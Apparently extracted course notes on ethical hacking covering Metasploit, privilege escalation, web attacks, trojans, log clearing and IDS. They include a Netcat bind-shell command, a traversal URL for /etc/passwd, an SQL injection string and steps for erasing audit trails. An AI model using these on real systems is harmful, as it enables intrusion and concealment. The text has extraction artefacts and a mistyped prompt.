‭ aining Access, Maintaining Access & Covering‬

G
‭Tracks‬

‭System Hacking‬
‭🔹 What is System Hacking?‬

‭●‬ S
‭ ystem hacking refers to hacking various software-based technological systems like‬
‭desktops, laptops, etc.‬

‭●‬ I‭ t means compromising computer systems and software to gain access to the target‬
‭system.‬

‭●‬ ‭The goal is to‬‭steal or misuse sensitive information‬‭without the user’s consent.‬

‭🔹 How Hackers Do It:‬

‭●‬ H
‭ ackers exploit‬‭weaknesses in computer systems or‬‭networks‬‭to gain‬
‭unauthorized access.‬

‭●‬ ‭They understand‬‭how computer systems and software‬‭work internally.‬

‭●‬ ‭A hacker usually has good knowledge of:‬

‭○‬ ‭Systems‬

‭○‬ ‭Networking‬

‭○‬ ‭Other areas of computer science‬

‭🔹 Who is at Risk?‬
 ‭●‬ ‭Anyone using a computer connected to the internet‬‭is vulnerable.‬

‭●‬ ‭Online attackers can use various techniques to hijack systems.‬

‭🔹 Methods Used by Hackers:‬

‭1.‬ ‭Viruses‬

‭2.‬ ‭Trojans‬

‭3.‬ ‭Malware‬

‭4.‬ ‭Worms‬

‭5.‬ ‭Phishing techniques‬

‭6.‬ ‭Email spamming‬

‭7.‬ ‭Social engineering‬

‭8.‬ ‭Exploiting OS vulnerabilities‬

‭9.‬ ‭Port vulnerabilities‬

‭🔹 What Happens After a System Is Hijacked?‬

‭1.‬ ‭Delete‬‭the victim's files and data‬

‭2.‬ ‭Steal‬‭files and folders‬

‭3.‬ ‭Hijack‬‭usernames and passwords‬

‭4.‬ ‭Steal money‬‭or credit card info during online transactions‬

 ‭5.‬ ‭Sell personal info‬‭to third parties for illegal use‬

‭6.‬ ‭Create fake traffic‬‭to shut down the victim’s website‬

‭7.‬ ‭Access servers‬‭and‬‭manipulate files and programs‬

‭ ystem Hacking Platform‬

S
‭🐧 Linux System Hacking‬

‭🔹 What is Linux?‬

‭●‬ ‭Linux is an‬‭Operating System (OS)‬‭based on‬‭Unix‬‭.‬

‭●‬ ‭It was created by‬‭Linus Torvalds‬‭.‬

‭●‬ ‭Developed under the‬‭open-source software model‬‭.‬

‭🔹 Why Hackers Target Linux?‬

‭●‬ ‭To hack a Linux system, you must understand its‬‭file‬‭structure‬‭.‬

‭●‬ ‭Linux is one of the most secure OS‬‭, but in hacking,‬‭nothing is 100% secure‬‭.‬

‭🔹 Common Techniques to Hack Linux:‬

‭1.‬ ‭Using SHADOW file‬‭to extract and crack password hashes.‬

‭2.‬ ‭Bypassing user password‬‭prompt during login or boot.‬

‭3.‬ ‭Finding bugs or errors‬‭in the Linux distribution and‬‭exploiting them‬‭.‬

‭🪟 Windows System Hacking‬

‭🔹 Login Security:‬

‭●‬ ‭Windows login password helps to‬‭prevent unauthorized‬‭access‬‭.‬

‭●‬ I‭ t’s good practice to keep a‬‭strong password (8+ characters)‬‭to secure files and‬
‭folders.‬

‭🔹 Hacking Techniques Used:‬

‭●‬ ‭There are many‬‭cracks and tricks‬‭to break Windows‬‭passwords.‬

‭●‬ ‭But the‬‭most effective method‬‭(from a hacker’s point‬‭of view) is:‬

‭○‬ ‭Use‬‭social engineering‬‭to get access when the user‬‭leaves the system open.‬

‭○‬ ‭Modify the existing password‬‭and‬‭set a new one‬‭.‬

‭○‬ ‭The victim remains‬‭unaware of the change‬‭.‬

‭System Hacking Tools‬

‭What is Metasploit?‬

‭●‬ M
‭ etasploit‬‭is one of the most powerful tools used in‬‭ethical hacking and‬
‭penetration testing‬‭.‬

‭●‬ ‭It is available in‬‭two versions‬‭:‬

‭‬ C
○ ‭ ommercial version‬‭(paid)‬
‭○‬ ‭Community version‬‭(free)‬
‭🔹 What is Kali Linux?‬

‭●‬ ‭Kali Linux‬‭is a popular‬‭Linux distribution‬‭used by ethical hackers.‬

‭●‬ I‭ t comes‬‭pre-installed‬‭with the‬‭Metasploit Framework‬‭(community edition)‬‭and‬

‭many other hacking tools.‬

‭🔹 Installing Metasploit Separately:‬

‭●‬ ‭Can be installed on‬‭Windows, Linux, or Mac OS X‬‭.‬

‭●‬ ‭Hardware Requirements‬‭:‬

‭1.‬ ‭1.2 GHz processor‬

‭2.‬ ‭1 GB RAM‬

‭3.‬ ‭1 GB free disk space‬

‭🔹 How to Open Metasploit in Kali Linux:‬

‭●‬ G
‭ o to:‬
‭Applications → Exploitation Tools → Metasploit‬

‭●‬ ‭After opening, a screen will appear showing the version info in‬‭red underlined text‬‭.‬

‭🎯 Using Metasploit – Step-by-Step Example‬

‭🔹 Scenario:‬

‭●‬ ‭The‬‭Linux machine‬‭is found to be‬‭vulnerable to an FTP service‬‭.‬

‭●‬ ‭You can use Metasploit to‬‭exploit this vulnerability‬‭.‬

‭🔹 Commands and Steps:‬
‭Find the correct exploit‬‭using:‬

‭ ss‬
c
‭CopyEdit‬
mfs> use [exploit path]‬
‭

‭1.‬

‭View required settings‬‭:‬

‭ gsql‬
p
‭CopyEdit‬
mfs> show options‬
‭

‭2.‬

‭Set target details‬‭:‬

s‭ hell‬
‭CopyEdit‬
mfs> set RHOST 192.168.1.101‬
‭
mfs> set RPORT 21‬
‭

‭3.‬

‭Run the exploit‬‭:‬

‭ rduino‬
a
‭CopyEdit‬
mfs> run‬
‭

‭ .‬
4
‭5.‬ ‭If successful, you will get an‬‭active session‬‭to interact with the target system.‬

‭Buffer Overflows‬

‭🔹 What is a Buffer Overflow?‬

 ‭●‬ A
‭ ‬‭Buffer Overflow‬‭is a hacking attempt that targets‬‭weaknesses in application‬
‭code‬‭.‬

‭●‬ ‭It happens when‬‭too much data is sent‬‭to a field (variable)‬‭in an application.‬

‭🔹 How it works:‬

‭1.‬ ‭Overflow data‬‭is sent to a field beyond its storage‬‭capacity.‬

‭2.‬ ‭This causes the‬‭application to crash or behave unexpectedly‬‭.‬

‭3.‬ ‭The overflowed data may‬‭overwrite important instructions‬‭or memory‬‭.‬

‭4.‬ ‭The app might:‬

‭○‬ ‭Execute commands‬‭in the overflow data.‬

‭○‬ ‭Or‬‭open a command prompt‬‭, allowing the attacker to‬‭run other commands.‬

‭🔹 Why it's dangerous?‬

‭●‬ ‭The command prompt gained through buffer overflow is a‬‭gateway‬‭for hackers to:‬

‭○‬ ‭Run malicious scripts‬

‭○‬ ‭Launch other apps‬

‭○‬ ‭Gain deeper access to the system‬

‭🔐 Privilege Escalation‬
‭🔹 What is Privilege Escalation?‬

‭●‬ ‭It is the‬‭third step‬‭in the hacking cycle.‬

‭●‬ ‭It refers to‬‭gaining higher permissions‬‭than initially‬‭granted.‬

‭●‬ ‭Example: Turning a‬‭normal user account into an Administrator‬‭account.‬

‭🔹 Why is it needed?‬

‭●‬ ‭Administrator accounts can:‬

‭○‬ ‭Install/remove programs‬

‭○‬ ‭Access sensitive files‬

‭○‬ ‭Control user permissions‬

‭●‬ I‭ f the hacker can’t get direct Admin access, they’ll try to‬‭escalate privileges‬‭from a‬
‭lower-level account.‬

‭🔹 How it's done:‬

‭1.‬ ‭Gain access‬‭to a basic user account.‬

‭2.‬ ‭Use tools or OS vulnerabilities to‬‭increase privileges‬‭.‬

‭3.‬ O
‭ nce admin access is gained, hackers can‬‭run powerful‬‭programs or exploit‬
‭further‬‭.‬

‭🔹 Tools for Privilege Escalation:‬

 ‭●‬ ‭GetAdmin.exe‬‭:‬

‭○‬ ‭Adds a user to the local administrators group.‬

‭○‬ ‭Uses NT kernel routines.‬

‭○‬ ‭Needs server console access to run.‬

‭○‬ ‭Works on‬‭Windows NT 4.0 SP3 only‬‭.‬

‭●‬ ‭Hk.exe‬‭:‬

‭○‬ ‭Exploits a Local Procedure Call (LPC) flaw in Windows NT.‬

‭○‬ ‭Allows non-admin users to become admins.‬

‭Application Hacking‬
‭1. SMTP / Email-based Attacks‬

‭ MTP (Simple Mail Transfer Protocol) is used to send emails. Hackers exploit vulnerabilities‬
S
‭in email systems to:‬

‭●‬ ‭Spoof Email Addresses‬‭: Sending emails that appear to be from trusted sources.‬

‭●‬ P
‭ hishing‬‭: Tricking users into clicking malicious links or sharing sensitive‬
‭information.‬

‭●‬ ‭Spam‬‭: Sending bulk emails to spread malware or scams.‬

‭●‬ O
‭ pen Relay Abuse‬‭: Misconfigured SMTP servers used‬‭to send spam emails‬
‭anonymously.‬

‭●‬ ‭Preventive Measures‬‭:‬

‭○‬ ‭Use email filtering and anti-virus tools.‬

 ‭○‬ ‭Implement SPF, DKIM, and DMARC to authenticate emails.‬

‭2. VOIP Vulnerabilities‬

‭ OIP (Voice Over IP) enables voice communication over the internet. It can be targeted in‬
V
‭the following ways:‬

‭●‬ ‭Eavesdropping‬‭: Intercepting unencrypted calls.‬

‭●‬ ‭Caller ID Spoofing‬‭: Faking caller identity to scam‬‭users.‬

‭●‬ ‭Denial of Service (DoS)‬‭: Overloading the VOIP server‬‭to disrupt service.‬

‭●‬ ‭Registration Hijacking‬‭: Stealing SIP credentials to‬‭make calls.‬

‭●‬ ‭Preventive Measures‬‭:‬

‭○‬ ‭Use encryption like SRTP.‬

‭○‬ ‭Implement strong authentication.‬

‭○‬ ‭Keep VOIP software updated.‬

‭3. Directory Traversal‬

‭This attack allows hackers to access files and directories outside the web root folder.‬

‭●‬ H ../‬‭characters in URLs to move up in the directory‬

‭ ow it Works‬‭: By using‬‭
‭structure.‬

http://example.com/view?file=../../etc/passwd‬
‭○‬ ‭Example:‬‭

‭●‬ ‭Consequences‬‭: Access to sensitive files like passwords or configuration files.‬

 ‭●‬ ‭Preventive Measures‬‭:‬

‭○‬ ‭Input validation and sanitization.‬

‭○‬ ‭Restrict file access permissions.‬

‭○‬ ‭Use secure programming practices.‬

‭4. Input Manipulation‬

‭Input manipulation involves altering input data to exploit vulnerabilities in applications.‬

‭●‬ ‭Types‬‭:‬

‭○‬ ‭Command Injection‬‭: Injecting OS commands.‬

‭○‬ ‭HTML Injection‬‭: Injecting malicious HTML.‬

‭○‬ ‭Cookie Manipulation‬‭: Modifying cookies to escalate‬‭privileges.‬

‭●‬ ‭Preventive Measures‬‭:‬

‭○‬ ‭Use input validation.‬

‭○‬ ‭Sanitize and encode user inputs.‬

‭○‬ ‭Avoid using user input directly in system commands.‬

‭5. Brute Force Attacks‬

‭This involves trying all possible combinations of usernames and passwords to gain access.‬

‭●‬ ‭Types‬‭:‬
 ‭○‬ ‭Online Brute Force‬‭: Direct login attempts.‬

‭○‬ ‭Offline Brute Force‬‭: Cracking stolen password hashes.‬

‭●‬ ‭Preventive Measures‬‭:‬

‭○‬ ‭Use CAPTCHA.‬

‭○‬ ‭Implement account lockout after failed attempts.‬

‭○‬ ‭Enforce strong password policies.‬

‭6. Unsecured Login Mechanisms‬

‭Login mechanisms that lack proper security measures can be exploited.‬

‭●‬ ‭Common Weaknesses‬‭:‬

‭○‬ ‭Transmitting credentials in plain text.‬

‭○‬ ‭No session timeout.‬

‭○‬ ‭No multi-factor authentication.‬

‭●‬ ‭Preventive Measures‬‭:‬

‭○‬ ‭Use HTTPS to encrypt communication.‬

‭○‬ ‭Implement MFA.‬

‭○‬ ‭Ensure secure session management.‬

‭7. SQL Injection‬

‭SQL Injection is one of the most dangerous web application attacks.‬

 ‭●‬ ‭How it Works‬‭: Malicious SQL statements are inserted‬‭into an input field.‬

' OR '1'='1‬
‭○‬ ‭Example:‬‭

‭●‬ C
‭ onsequences‬‭: Unauthorized access to database, data‬‭leakage, or data‬
‭manipulation.‬

‭●‬ ‭Preventive Measures‬‭:‬

‭○‬ ‭Use parameterized queries (prepared statements).‬

‭○‬ ‭Validate and sanitize all inputs.‬

‭○‬ ‭Limit database user privileges.‬

‭8. Cross-Site Scripting (XSS)‬

‭XSS involves injecting malicious scripts into webpages viewed by other users.‬

‭●‬ ‭Types‬‭:‬

‭○‬ ‭Stored XSS‬‭: Script stored on the server and served‬‭to users.‬

‭○‬ ‭Reflected XSS‬‭: Script embedded in a URL and executed immediately.‬

‭●‬ ‭Consequences‬‭: Session hijacking, redirection to malicious sites.‬

‭●‬ ‭Preventive Measures‬‭:‬

‭○‬ ‭Sanitize and encode output.‬

‭○‬ ‭Use Content Security Policy (CSP).‬

‭○‬ ‭Avoid using user input directly in HTML/JS.‬

‭9. Mobile Applications Security‬

‭Mobile apps are often targets for hackers due to insecure development practices.‬

‭●‬ ‭Common Issues‬‭:‬

‭○‬ ‭Insecure storage of sensitive data.‬

‭○‬ ‭Weak encryption.‬

‭○‬ ‭Poor authentication and authorization.‬

‭○‬ ‭Reverse engineering of APKs.‬

‭●‬ ‭Preventive Measures‬‭:‬

‭○‬ ‭Secure coding practices.‬

‭○‬ ‭Use strong encryption (AES, RSA).‬

‭○‬ ‭Regular security testing and updates.‬

‭Malware Analysis‬
‭●‬ D
‭ efinition‬‭: Malware analysis is the process of understanding how malware works‬
‭and what impact it might have on the system.‬

‭●‬ P
‭ urpose‬‭: To identify malware's functionalities and‬‭predict the potential outcome of‬
‭an infection.‬

‭●‬ ‭Types of Malware‬‭:‬

‭○‬ ‭Worms‬

‭○‬ ‭Viruses‬
 ‭○‬ ‭Spyware‬

‭○‬ ‭Trojan horses‬

‭●‬ K
‭ ey Point‬‭: Malware collects data from an infected device‬‭without the user’s‬
‭knowledge or consent‬‭.‬

‭Netcat Trojan‬

‭●‬ ‭What is Netcat?‬

‭○‬ A
‭ Trojan that uses a command-line interface to open‬‭TCP or UDP ports‬‭on a‬
‭target system.‬

‭●‬ ‭Function‬‭:‬

‭○‬ ‭Allows hackers to‬‭Telnet‬‭into the open ports.‬

‭○‬ ‭Provides‬‭shell access‬‭to the target system.‬

‭●‬ ‭Availability‬‭:‬

‭○‬ ‭Available for all Windows OS.‬

‭○‬ O
‭ riginally developed for Unix and included in many Linux distributions like‬
‭BackTrack.‬

‭●‬ ‭How It Works‬‭:‬

‭○‬ ‭Needs to run on both the‬‭client‬‭and the‬‭server‬‭.‬

-i‬‭attribute‬‭to create a listener‬‭port.‬

‭○‬ ‭The server uses the‬‭

‭Example Command (on server)‬‭:‬

nc -L -p 123 -t -e cmd.exe‬
‭
‭Client-side Command‬‭:‬
nc <IP address of the server> <listening port>‬
‭

‭Wrappers‬

‭●‬ D
‭ efinition‬‭: Wrappers are software packages used to‬‭deliver a Trojan‬‭by binding it‬
‭to a legitimate file.‬

‭●‬ ‭Functionality‬‭:‬

‭1.‬ ‭Combine‬‭authorized software‬‭and‬‭Trojan‬‭into one executable.‬

‭2.‬ ‭Both get installed when the user runs the program.‬

‭●‬ ‭Common Bait‬‭:‬

‭1.‬ ‭Games‬‭or‬‭animated installers‬‭are often used.‬

‭2.‬ ‭These distract users while the Trojan installs silently in the background.‬

‭●‬ ‭Examples‬‭:‬

‭1.‬ ‭Graffiti‬‭: An animated game that entertains the user while the Trojan installs.‬

‭2.‬ ‭Silk Rope 2000‬‭: Wraps the Back Orifice server with‬‭another app.‬

‭3.‬ ‭ELITeWrap‬‭:‬

‭■‬ ‭Advanced .exe wrapper.‬

‭■‬ C
‭ an create setup programs that extract files, run programs or batch‬
‭files, display help, or copy files to target systems.‬

‭Reverse Engineering‬

‭Definition:‬
 ‭●‬ T
‭ he process of‬‭disassembling‬‭something to understand‬‭how it works, either to‬
‭duplicate‬‭or‬‭enhance‬‭it.‬

‭Software Reverse Engineering:‬

‭●‬ ‭Purpose‬‭:‬

‭○‬ ‭Retrieve lost source code.‬

‭○‬ ‭Understand program behavior.‬

‭○‬ ‭Improve performance.‬

‭○‬ ‭Fix bugs.‬

‭○‬ ‭Identify viruses or malware.‬

‭○‬ ‭Adapt software for a different processor.‬

‭●‬ ‭How‬‭:‬

‭○‬ ‭Converts‬‭machine code‬‭back into‬‭source code‬‭using language statements.‬

‭●‬ ‭Legal Concerns‬‭:‬

‭○‬ ‭May‬‭violate copyright‬‭if done without authorization.‬

‭○‬ ‭Some software licenses‬‭prohibit‬‭reverse engineering.‬

‭●‬ ‭Tools Used‬‭:‬

‭○‬ ‭Hexadecimal Dumper‬‭: Displays binary data in hexadecimal.‬

‭○‬ ‭Helps identify parts of code and understand processor instructions.‬

‭Hardware Reverse Engineering:‬

 ‭●‬ ‭Definition‬‭:‬

‭○‬ ‭Taking apart a hardware device to see how it works.‬

‭●‬ ‭Example‬‭:‬

‭○‬ A
‭ processor manufacturer buys a competitor’s processor, studies it, and‬
‭creates a similar one (‬‭illegal in many countries‬‭).‬

‭●‬ ‭Challenges‬‭:‬

‭○‬ ‭Requires‬‭high expertise‬‭.‬

‭○‬ ‭Expensive process‬‭.‬

‭●‬ ‭Part Reverse Engineering‬‭:‬

‭○‬ ‭Used when no blueprint is available.‬

‭○‬ ‭Measured using‬‭CMM (Coordinate Measuring Machine)‬‭.‬

‭○‬ ‭Generates a‬‭3D wireframe‬‭model of the part.‬

‭Forward Engineering:‬

‭●‬ T
‭ he opposite of reverse engineering — building something from scratch using‬
‭original specifications.‬

‭Phases: Covering Your Tracks‬

‭✅ Definition‬

‭●‬ ‭Once a hacker gains‬‭Administrator access‬‭, they attempt to‬‭cover their tracks‬‭to:‬

‭1.‬ ‭Avoid detection (past or current activity).‬

 ‭2.‬ ‭Prevent system admins or authorities from tracing their‬‭identity‬‭or‬‭location‬‭.‬

‭●‬ ‭Typical actions include:‬

‭1.‬ ‭Erasing error messages‬

‭2.‬ ‭Clearing security events‬

‭●‬ ‭Two common methods:‬

‭1.‬ ‭Disabling auditing‬

‭2.‬ ‭Clearing or altering event logs‬

‭🛑 Disabling Auditing‬
‭●‬ ‭Windows uses‬‭auditing‬‭to log events like:‬

‭○‬ ‭Logins‬

‭○‬ ‭Application usage‬

‭○‬ ‭System activity‬

‭●‬ ‭These are stored in the‬‭Windows Event Viewer‬‭.‬

‭●‬ ‭Hackers disable this to stop new logs from being generated.‬

‭●‬ ‭Steps:‬

‭○‬ ‭Check the‬‭logging level‬‭.‬

‭○‬ ‭Disable auditing if logging reveals traces of hacker activity.‬

‭●‬ ‭Why?‬
 ‭○‬ ‭Prevents future actions from being recorded.‬

‭○‬ ‭Avoids suspicion during forensic analysis.‬

‭🕵️‍♂️ Techniques of Covering Tracks‬

‭1. Steganography (Hiding Data in Images/Media)‬

‭🔸 What is it?‬

‭●‬ ‭Steganography‬‭is the art of hiding‬‭data inside other‬‭files‬‭like:‬

‭○‬ ‭Images‬

‭○‬ ‭Audio‬

‭○‬ ‭Text‬

‭●‬ ‭Hackers use it to store:‬

‭○‬ ‭Secret messages‬

‭○‬ ‭Login credentials‬

‭○‬ ‭Malicious instructions‬

‭🔸 Examples:‬

‭●‬ ‭Image Hide‬‭:‬

‭○‬ ‭Hides large text in image files without increasing file size.‬

‭○‬ ‭Undetectable through normal image viewers.‬

‭●‬ ‭Blindside‬‭:‬
 ‭○‬ ‭Command-line tool for hiding data in‬‭BMP images‬‭.‬

‭●‬ ‭MP3Stego‬‭:‬

‭○‬ ‭Hides data during MP3 compression.‬

‭○‬ ‭Encrypts and compresses before embedding in the bitstream.‬

‭🔸 Detection Tools:‬

‭●‬ ‭Stegdetect‬‭:‬

‭○‬ ‭Automatically detects stego content in JPEGs.‬

‭○‬ ‭Identifies multiple embedding techniques.‬

‭●‬ ‭Dskprobe‬‭:‬

‭○‬ ‭A Windows 2000 tool that scans disk sectors.‬

‭○‬ ‭Can find hidden data embedded at a low level.‬

‭2. Event Log Alteration‬

‭🔸 Why is it done?‬

‭●‬ ‭Even after disabling auditing,‬‭previous logs may still exist‬‭.‬

‭●‬ ‭Hackers clear these logs to‬‭remove evidence of past‬‭activity‬‭.‬

‭🔸 Suspicious Indicators:‬

‭●‬ ‭Logs with‬‭very few entries‬‭= a sign of tampering.‬

‭🔸 Tools Used:‬
 ‭●‬ ‭elsave.exe‬‭:‬

‭○‬ ‭A simple, command-line utility to clear event logs.‬

‭●‬ ‭WinZapper‬‭:‬

‭○‬ ‭Used to‬‭selectively delete‬‭entries from the Windows‬‭2000 security log.‬

‭●‬ ‭Manual method: Delete entries via‬‭Event Viewer‬‭.‬

‭Additional Security Mechanisms‬

‭🔍 1. IDS/IPS (Intrusion Detection/Prevention Systems)‬

‭✅ Intrusion Detection Systems (IDS)‬

‭●‬ T
‭ hese systems‬‭inspect traffic‬‭and‬‭look for known attack patterns‬‭or‬‭unusual‬
‭behavior signatures‬‭.‬

‭●‬ ‭Acts like a‬‭packet-sniffer‬‭, monitoring traffic for‬‭threats.‬

‭●‬ T
‭ he‬‭command center system‬‭notifies the administrator‬‭(via email, pager, or phone)‬
‭when a suspicious event is detected from the security event list.‬

‭✅ Intrusion Prevention Systems (IPS)‬

‭●‬ I‭ PS‬‭automatically takes countermeasures‬‭, like‬‭blocking traffic‬‭, when it detects‬

‭suspicious flows.‬

‭●‬ ‭It helps automate response and enables‬‭deny-access‬‭capabilities‬‭against intrusions.‬

‭🔄 Types of IDS‬

‭🔹 1. Host-based IDS (HIDS)‬

 ‭●‬ ‭Applications that run on a‬‭single system/host‬‭.‬

‭●‬ ‭Filters traffic/events using a‬‭signature list specific‬‭to the OS‬‭.‬

‭●‬ ‭Examples:‬

‭○‬ ‭Norton Internet Security‬

‭○‬ ‭Cisco Security Agent (CSA)‬

‭●‬ ‭Limitation:‬

‭○‬ ‭Many‬‭Trojans and worms‬‭can disable HIDS.‬

‭🔹 2. Network-based IDS (NIDS)‬

‭●‬ ‭Software-based appliances‬‭that monitor‬‭network traffic‬‭.‬

‭●‬ ‭Designed to detect:‬

‭○‬ ‭Network attacks‬‭(e.g., against vulnerable services)‬

‭○‬ ‭Application-level attacks‬

‭○‬ ‭Host-based attacks‬‭(e.g., unauthorized logins, access‬‭to sensitive files)‬

‭○‬ ‭Privilege escalation‬

‭○‬ ‭Malware‬

‭●‬ ‭Passive system: Detects and logs security breaches, sends alerts to the console.‬

‭🧠 Detection Techniques in IDS‬

‭🧬 Signature-Based Detection‬
 ‭●‬ ‭Compares traffic with‬‭known attack signatures/patterns‬‭.‬

‭●‬ ‭A‬‭signature‬‭identifies one or more packets that collectively‬‭indicate an attack.‬

‭⚠️ Anomaly-Based Detection‬

‭●‬ ‭Detects‬‭unusual access behavior‬‭(e.g., abnormal login‬‭patterns, file access).‬

‭●‬ ‭Uses baselines of‬‭normal user activity‬‭to flag anomalies.‬

‭🎭 IDS Evasion Techniques by Hackers‬

‭Technique‬ ‭Description‬

‭ rotocol‬
P ‭ sing a different protocol (e.g., UDP instead of TCP) to avoid‬
U
‭Substitution‬ ‭signature matches.‬

‭Session Splicing‬ ‭ plitting attack into multiple packets to bypass IDS, but‬
S
‭reassembled at destination to perform the attack.‬

‭Obfuscation‬ ‭ ncrypting payloads, inserting extra/misleading data to confuse‬

E
‭IDS.‬

‭ ession‬
S ‭ aking over a client's session by desynchronizing the IDS’s ability‬
T
‭Hijacking‬ ‭to track traffic.‬

‭2. Honeypots (Decoy Systems to Detect Attacks)‬

‭📌 Definition & Purpose‬

 ‭●‬ ‭A‬‭honeypot‬‭is a‬‭decoy system‬‭placed within a network‬‭(usually in the‬‭DMZ‬‭).‬

‭●‬ ‭Created by security professionals to:‬

‭○‬ ‭Attract and trap hackers‬

‭○‬ ‭Log attacker behavior‬

‭○‬ ‭Divert them away from real systems‬

‭🗂️ Key Features‬

‭●‬ ‭Logs attacker information like‬‭IP address‬‭, activities, etc.‬

‭●‬ ‭Helps in identifying or tracing the hacker during/after an attack.‬

‭●‬ ‭Best placement:‬‭In front of the firewall in DMZ‬‭, appearing‬‭like a real server.‬

‭●‬ ‭A honeypot with a‬‭static IP‬‭appears more realistic‬‭to hackers.‬

‭🔐 3. Cryptography (For Data Security, Confidentiality, Integrity)‬

‭✅ Best Practices‬

‭●‬ C
‭ ryptographic functions should be implemented on a‬‭trusted system‬‭(e.g., the‬
‭server).‬

‭●‬ ‭Protect‬‭master secrets‬‭(keys, credentials) from‬‭unauthorized‬‭access‬‭.‬

‭●‬ ‭Ensure cryptographic modules:‬

‭○‬ ‭Fail securely‬

‭○‬ ‭Do not leak sensitive info upon failure‬

‭🔢 Randomness & Key Management‬

‭●‬ ‭Use‬‭approved cryptographic RNGs (Random Number Generators)‬‭for:‬

‭○‬ ‭Random numbers‬

‭○‬ ‭Random file names‬

‭○‬ ‭Random strings, GUIDs, etc.‬

‭●‬ ‭These should be‬‭unguessable‬‭if used for security purposes.‬

‭●‬ ‭Establish and follow a‬‭cryptographic key management‬‭policy‬‭and‬‭process‬‭for:‬

‭○‬ ‭Key generation‬

‭○‬ ‭Key distribution‬

‭○‬ ‭Key storage‬

‭○‬ ‭Key rotation and revocation‬